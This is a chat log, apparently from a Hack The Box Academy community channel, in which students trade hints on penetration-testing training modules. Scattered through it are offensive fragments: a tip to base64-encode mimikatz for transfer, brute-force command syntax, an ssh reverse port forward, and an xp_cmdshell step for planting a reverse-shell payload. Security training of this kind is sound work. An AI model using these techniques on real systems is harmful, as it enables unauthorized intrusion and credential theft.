you can base64 encode mimikatz and decode the string on the other host

but that kinda sucks

that reverse port forward should work, i don't know why it doesn't

you could set up a share on the windows box

me neither but google may help you here

all is well that ends well

anyone did the HTB module Linux Local Privilege Escalation , i need a hint for gaining foothold on the machine without using ssh creds

Thanks for this hint. I was doing zone transfers until my fingers bled. Thanks for the syntax correction!

we really need a button to extend time on labs🫠

I know there is an extend button for pwnbox

it's usually the labs that kill me... especially on this pivot skill assessment. I guess it's good I'm practicing the commands, but it's annoying going through all the hosts again

@rustic sage Do u need help

i think in general i agree that there needs to be an extension like pwnbox for the target host. even if it is similar to a 1 time extension. sometimes you just need a bit more time to finish what you started and you really don't want to redo a bunch of work to just get back to where you were

not at the moment I haven't really given it a try yet, I just got kicked out on the second to last host lol! thank-you though I'll reach out if I need help💚

@rustic sage no problem 😊

how im i supposed to acces websites??

im doing the The Live Engagement

through your rdp

i am

i never use parrot btw

use firefox, run firefox in the terminal

wdym

open a terminal and run firefox

ye got it cheers

why arent they the same if someone can clarify what are the signals and how to apply them with the kill command it would be great!!

linux fundamentals module btw

which section is it in?

service and process management

and am using my own vm not the instance built in htb

Am still in that module too! 🤧

so the section talks about some of the most commonly used ones

about halfway down the page

yep but when I try em in my vm it just doesn't work

is the ping command running constantly while you are trying to kill it?

yeh

try another process

see if you can kill it

okay

nope

try stopping it and then killing it

ctrl c or z

XXDD

sudo kill 20 PID

lol

try pkill

yep worked

so why wasnt kill cmd workin

might be bc it had a parent process

oh

gotcha

okay thx bro

np

Guys I'm stuck in Whitelist Filters section of file upload module, I've tried the given script and the classic php extension wordlist but nothing

Can anyone help me?

hi guys i cant open sites of any machines

i can ping the sites but cant open in my browser

getting dns error/ nx_domain error

can anyone help?

are they vhosts?

What is the password for the account logistics.inlanefreight.local/htb-student_adm so you can do module Attacking Domain Trusts - Child -> Parent Trusts - from Linux from ACTIVE DIRECTORY ENUMERATION & ATTACKS . I can not find it anywhere.

nobody here is going to give you the password. use your acquired knowledge and tools to find it

okay, so I need to fully attack the linux box to do this exercise? that doesnt seem right?

every other exercise has provided the passwrod within the module

for the user account

i don't have my notes rn so i am unsure

fair enough!

the exercise gives you creds already...

yes to ssh to the pivot host, you need the password for the account shown in all the examples from the domain to run the assoicadted commands

htb-student is not the same as the other account, the other account is a domain account, and from what I have seen one that has not come up before.

thank you for the help! I decided just to leave it and come back though! plenty of other ones to do 😛

anyone experiencing issues today? i am on ACL enumeration and the powerview commands just hangs. i have reset teh machine like 3 times already

the powerview commands for acl enumeration take a long time to finish.

yeah it should come with a warning but I know which one youre talking about too, I thought it was also hanging.

its seriously like 15-20 mins to finish

it takes way too long

you might as well watch an episode of kitchen nightmares while you're waiting

Hello, I'm stuck at the SSTI assessment. i can't seem to solve it without registering, there is no attack vector that is not sanitized. can anyone give me a hint where the unsanitized field should be? I also followed the scheme, but it was not vulnerable even if registering and creating a post

Hello, I need help with the "information gathering -web edition" module, in the "Skill assessment" section, question 3. Please!

could someone help me with the module footprinting on the section dns, i am at the last step to find the fqdn for a specific host but i cant seem to find it. could someone maybe point me in the right direction

has nothing really to do with what you learned in this modul...you have to view the source code and look after the java script code....

try it...when it doesnt work DM me... I also needed help in that..I would never have solved it on my own😂

im on the vulnerability assessment module and trying to get the nessus service to start on the machine provided and its not working. says that nessusd.service not found

i am trying to start it with sudo systemctl start nessusd.service as the module instructs

um, shouldn't it already be started?

didnt seem like it. i tried to access it at the ip provided and it wasnt working

going to try another box real quick

see if maybe its just a bug

the module says the following:

The VM provided at the Nessus Skills Assessment section has Nessus pre-installed and the targets running. You can go to that section and start the VM and use Nessus throughout the module, which can be accessed at https:// < IP >:8834. The Nessus credentials are: htb-student:HTB_@cademy_student!. You may also use these credentials to SSH into the target VM to configure Nessus.

ok NOW it works

mustve been the box

can some help me with the footprinting dns module i tried the hint but it didn´t realy help

Lol learning about burpsuite and realizing how I could’ve used it to make so many of my projects easier. Instead of manually verifying web requests through inspect tool and other methods

During the password cracking module i have to use credential lists (crackmapexec -u user.list -p password.list). Some are password-only lists, some are user only lists. How do I use credential lists? (username:password) and how do I use CSV files (pass1, pass2, pass3 \n pass4, pass5, etc.)

someone can help with the Firewall and IDS/IPS Evasion - Hard Lab ?

Yes I think I can D0lf, what's your question?

I have run many types of scans, in many different ways. I've run them from a virtual machine and from the HTB instance, but I can't get through.

Can you send me the Q again? I forgot what the Q was about 😛

With our second test's help, our client was able to gain new insights and sent one of its administrators to a training course for IDS/IPS systems. As our client told us, the training would last one week. Now the administrator has taken all the necessary precautions and wants us to test this again because specific services must be changed, and the communication for the provided software had to be modified. AND THEN:

Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer.

Ah right, I can give you some hints on that (its the Nmap module right?) Mind if I DM you?

Of course, thank u

why is my connection keep timing out?

would an adware blocker cause that?

thank you for your reply mate, now im in the Password Mutations section, i think i will be stuck here lol

@vital adder i apreciate any hint

pivot, tunenling and port forwarding, section remote/reverse port forwarind:
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN ==> this command do i have to execute from the ubuntu server right?

and the internalIPofPivotHost is the ubuntu servers IP right?

Can someone give me a hint (privately if possible) on the Password crack module - Network Services? (question: Find the user for the WinRM service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.) - I can't find the username, I tried using usernamelists and passwordlists but none of the combinations seem to work. How do I find the username for the WINRM service?

No, I didn‘t. Are you having the same problem?

Anyone mind providing a nudge on Credential hunting in linux? ||I have been able to ssh with kira mutated creds and found the notes.zip file. But need guidance on how to crack the password protected file.||

Module name: Shells & Payloads

Section name: PHP Web Shells

I'm having trouble getting the webshell to correctly upload like in the module example. I'm changing the content-type in burp but it doesn't seem to be uploading. Anyone else had trouble with this module?

hey im on web requests and im stuck trying to do the tutorial on a GET request for using curl to search for a city name. i get all that but they also say i can go on the devtools and right-click on the request and select copy curl but i see no result when i put in my search

did you manage to figure this out yet?

If it can help anybody with the IDS/IPS medium challenge i just spent 2h desperately trying from my vpn access to send the command. Sending the same command from the PwnBox got me the answer in 2sec...frustrating as it can get. Everything you need is in the "Firewall and IDS/IPS evasion" section

can anyone help me real quick with this bash script in the intro to bash scriping module? i just started and feel like im missing something obvious

I haven't done it but maybe I can help.. DM

Hello, Can't access the root shell in the local privilege escalation Kernel Exploits

@novel matrix

💀💀💀 funniest shit I've seen in a while

<@&861185840277487616> wake up sleepy heads

I'm awake sir

thanks for report

❤️

hey know im still stuck

no

ok and this is on the GET section?

its the tutorial not the question

uhm did you read the question?

im trying to copy>curl the request in te devtools and use

the

welllll lol i just searched for flag and i got it

i understand the http get request syntax for searching and i know where i would find it

but for the life of me i cant get it to appear

i know its goingto be somthing stupid lol

but im just not seeing it

so you entered the search term right

correct

and while dev tools is open, you hit enter right?

yes

ok standby let me see if i can replicate this

ok thank you

advanced xxe is a mind bender!

so many common applications..

im getting a request...

working as intended

did you try reloading the page

could also empty any previous requests like the module says to do

with trash can

i did that

ill try to load again wait one

lol target is down

one sec

ooo im so mad...thank you

thank you as well

np

ya just need to reload the page and i was good to go

if nothing's showing up and the dev tools say to Reload the page, you should probably do that

^ based

Yosh

ahhh beautiful

ugh help lol

why is that happening

i gtg if you could DM if you dont mind that be great

dont use caps in cURL

should be all lowercase

from memory i think change the user agent to curl also

i remember the user agent making a difference for some of those exercises

Can someone who has finished the sql injection skill assessment dm me? I have a question about why something worked when everything I can think of tells me it shouldn't.

DM

Pretend HTB isn't watching..

KALI or PWN distro?

In the modules, will they set up decoy flag.txt files???
doing one.. says very specifically "find the flag.txt file. Submit the contents of it as the answer. "... I have the flag.txt file and the contents I guess, are incorrect.

some boxes have multiple flags for different sections

but chances are youre just copying the answer wrong.

Aye I got the first flag, second one is the .txt file, maybe I'm crazy 😄

has anyone run into mysql-server having no RC in parrot metapackages, im working on Footprinting -> mysql

default-mysql-server is available but not mysql-server

Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Package mysql-server is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source

E: Package 'mysql-server' has no installation candidate

academy servers are slow?

can't seem to spawn a VM

yup same thing here, page loading is slow and spawning of VMs fail

Just tried to get in to the main site and was redirected to CloudFlare. Perhaps a DDOS attack.

a, a vm just spawned

yeah looks like we're back in business

I just realized how important programming is for hackers/pentesters

If I run my hydra on the Brute Force Skill Assessment - Website, and it says it found a successful un/pw, shouldnt i be able to log in with it?

I'd think so

For the Password Attacks module, network services. Are we just supposed to use whatever username list and password we want?

I think the lists we're given are fine

In resources

ls

Lols, didn't see the resources. XD Thank you

Yeah the resources will help a TON and don't forget the password mutations

user=user that part is wrong

hello, newbie here. Working my way through the Getting Start module knowledge check and I've made it to the file upload page on the admin portal but the link to upload the file isnt working... any tips?

should be user=^USER^

Hi, anyone knows how am I supposed to access the vHosts in this question?

Time Left: 87 minutes
vHosts needed for these questions:

    app.inlanefreight.local
    dev.inlanefreight.local

Tried adding inlanefreight.local to /etc/hosts, but it didn't work

Is it failing or just not finding the password?

check if you can edit any of the existing files in the server

sudo <whatevereditoryouuse> /etc/hosts

add in
<IP> app.inlanefreight.local dev.inlanefreight.local

can anyone help me with web attacks - advanced file disclosure?

I'm trying to use the CDATA method but it doesn't work

Thank you

it's because /etc/hosts is basically a local dns if you just put "app.inlanefreight.local dev.inlanefreight.local" it doesn't know what you're trying to do

I keep getting passwords but they are never correct

:F=<input name='pass' placeholder='Password' type='password'"

does the ||html use single quotes around log-in||?

well, i gues that owuldn't affec tit

Yes, the exact same error. Don't know what to do

#modules message

has anyone made or have a link for the machines to do for the HTB pentest certification

to do before exam

on-record the only thing is the pro-labs dante and I think Offshore though I think it's been discussed in #cpts ; even if someone has completed the CPTS exam - they cannot really say which labs do or do not correlate to completing the exam as that is equivalent to saying what is on the exam. :) But afaik as well there are no other labs or anything that are actually required to complete or anything, the module content should be enough

Yes, that's why I tried adding inlanefreight.local at the first place. What I didn't know is that you can have different FQDNs mapped to the same IP

yes they just need to be separated by spaces

@main ridge they can be on two separate spaces as well;
<IP> subdomain.sitename.com
<IP> othersubdomain.sitename.com

Yes , now that I'm reading the following section (virtual hosts), I'm understanding why it's possible to have the same IP mapped to different FQDNs

yeah I feel like that should come earlier

Maybe this section should be before the other (or unless a note)

: )

but they are at least expecting you to know the basics of
<IP> example.com

for /etc/hosts

if you still need it remove the first 17000 password

yes but the other interface on the ubuntu servers

yeah this module has a lot of credit REUSE (To make it easy)

what method did you use? the crackmapexec one from the example should work fine ad it's will be faster if you do it on the pwnbox, but the F ing cme on the pwnbox is now updated to a unusable version (i think i was for smb) so if you do it on the pwnbox and have issue with cme there should be some old message of my helping someone re-install a old version of cme

because most of the section is that module is using the same target machine you will see thing like that but that file doesn't have anything to do with the section you are on, your target is the will user

^

but yes that file comes into play 8 sections later LOL

so you saved your time of ssh into the target to begin with xD

Did anybody completed 'Introduction to NoSQL' In-band data extraction and could tell me what do I do wrong?

hey @vital adder you've done Password Attack yeah? I'm meant to mut the resource provided list with the resource provided rule as that's the ONLY info I have yeah? (And of course bruteforce the Service with it

if so I'm gonna go watch this paint dry rq

this can't be right for the bruteforcing module ... can it?

oh wait it finished 😄

can some one bump me in the right direction on "AD Enumeration & Attacks - Skills Assessment Part II" Q:"Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host" I have the creds for the SQL and have enabled xp_cmdshell. Tried to upload a "shell_reverse_tcp" that i created in msvenom. Tried to copy it with the following "EXEC xp_cmdshell 'xcopy "\172.16.7.240\compdata\help" "c:\users\public\downloads\help.txt" /y' and getting "Invalid drive specification" there is a smbserver and i can see it is connecting when downloading the file. am i going at this the wrong way or is there a diffrent appoach the get an interactive session on this machine

I am just wondering in general when doing sqlmap injections, is there any way to know which tamper script you should use or do you just go blindly 😄

you can add threads to your hydra command with -t i think the default is 16

I managed to find the answer! Nowhere on the page did it mention the resources, so I used the lists in Seclists, which yielded no results and cost me a few days hahaha thanks for replying though!

Just a quick question, would I by any means be able to learn hacking in 3 days,, and be able to get my exam questions from someone’s laptop, or is that far fetched

Generally if there's a provided resource it's meant to be used especially on the skills part

F in chat

No, there's a lot when it comes to hacking, and getting exam answers from somebody is cheating so that's also a no. There are no shortcuts to learning a skill

So.. I have to study.. yeah..?

Yeah

Using the supplied password list will save you time and frustrations

I am sorry but no, i am in cyber security sector about 1.5 years and i still need to know a lot of things

Exactly; things are constantly evolving

What if I ask someone to do it for me.. I’m certain my university’s security level is the weakest out there

For the skilss assessment I should also use the william.txt one?

oh weak credentials ones

If you are looking for someone to hack for you, that'll be a no, and against the #rules :) you're more than welcome to give https://academy.hackthebox.com a try if you're really needing to

Tsk… just.. joking.. haha.. but if there’s a real good hacker here without ethics hmu

I’ll check that thing out too

Just study and you won't need to waste money/time/effort on cheating

Thing is, I studied, I just know my professors don’t like passing students

Because if you get caught you'll most assuredly get kicked out if caught

That’s a point, yeah

Take that up with your education board or head of school

Not our problem

tfw I get to the end and the lab just dies on me

yeah i did see someone mentioned this to one of the staff a while ago and not sure why there is no update on this yet, also one of the issue in this module if you are brute forcing through a vpn it's going to take forever + the target machine is unstable lately so this may cost a lot of issue

But I'm meant to brute it with the user they're asking for, not lateral movement?

ohhh so you didn't know there is a resources

because if so aggressively

i mean using the the 2 wordlist is the intended for the one of the first section but if you can get a foothold with one of the cred you can just get the username from there

is there a reason to ||mutate|| it?

i mean that will give you a way bigger chance of getting a hit but longer brute force time

this is better for brute force hash

ty I'll try bruting the ftp with hydra again but the first time I didn't get any cred with the provided lists

if you wanna DM me any other tip or trick that i'm just not thinking of because i don't want to lose my sanity over this

:)

i got no note on why i have to use the given shell but i did in my note so try with the shell from wwwolf-php-webshell and for the content-type did you change it to the answer for question 1 in burp?

oh wait which section are you on?

if you're trying to access it; make sure you also access it via the name you gave the shell :)

the first skill assessment

easy

🙃

the majority of pw attack was simple just do the thing and it be happy

oh hint this is the only assessment that you don't need to use the mutated wordlist

but i guess that will work too just will take a good while

but I can attack using root? or is this a lateral movement one?

no idea what you mean by lateral movement but for the root user nope this machine have a different set of cred

get access then find root; was just making sure that if it was REALLY necessary attempting to just attack via the pwnbox

also that would probably explain why I didn't get creds :^)